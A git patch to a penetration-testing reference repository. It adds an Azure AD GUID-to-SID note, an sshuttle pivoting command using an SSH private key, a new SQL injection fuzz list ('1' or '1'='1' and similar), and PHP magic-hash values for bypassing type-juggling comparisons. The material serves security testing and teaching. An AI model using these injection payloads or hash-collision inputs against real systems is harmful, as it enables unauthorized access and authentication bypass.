From 04899355adfd17bbdf468d1e8c863ebb3b2e6161 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 26 Apr 2020 21:43:42 +0200 Subject: [PATCH] Magic Hashes + SQL fuzz --- .../Cloud - Azure Pentest.md | 15 ++++++++++++++- .../Network Pivoting Techniques.md | 3 +++ SQL Injection/Intruder/Generic_Fuzz.txt | 12 ++++++++++++ Type Juggling/README.md | 6 +++++- 4 files changed, 34 insertions(+), 2 deletions(-) create mode 100644 SQL Injection/Intruder/Generic_Fuzz.txt diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 9c4d692..7a3c720 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -7,6 +7,7 @@ * [Azure Storage Account - Access](#azure-storage-account----access) * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) * [Azure AD - Enumeration](#azure-ad---enumeration) +* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid) * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal) * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync) @@ -285,6 +286,17 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online 3. Pick the account from the active sessions 4. Select Azure Active Directory and enjoy! +## Azure AD - Convert GUID to SID + +The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. + +```powershell +GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] +SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] +``` + +For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` + ## Azure AD - Sign in with a service principal https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal @@ -443,4 +455,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) * [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) * [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) -* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) \ No newline at end of file +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 2fa5a50..f2fbcd6 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -151,6 +151,9 @@ pacman -Sy sshuttle apt-get install sshuttle sshuttle -vvr user@10.10.10.10 10.1.1.0/24 sshuttle -vvr username@pivot_host 10.2.2.0/24 + +# using a private key +$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" ``` ## chisel diff --git a/SQL Injection/Intruder/Generic_Fuzz.txt b/SQL Injection/Intruder/Generic_Fuzz.txt new file mode 100644 index 0000000..624fb4d --- /dev/null +++ b/SQL Injection/Intruder/Generic_Fuzz.txt @@ -0,0 +1,12 @@ +1 +1' +1" +[1] +1` +1\ +1/*'*/ +1/*!1111'*/ +1'||'asd'||' +1' or '1'='1 +1 or 1=1 +'or''=' \ No newline at end of file diff --git a/Type Juggling/README.md b/Type Juggling/README.md index c51c805..7e97f99 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -42,9 +42,13 @@ var_dump(md5([])); # NULL If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. -| Hash | “Magic” Number / String | Magic Hash | Found By | +| Hash | “Magic” Number / String | Magic Hash | Found By / Description | | ---- | -------------------------- |:---------------------------------------------:| -------------:| | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | | SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | | SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | | SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |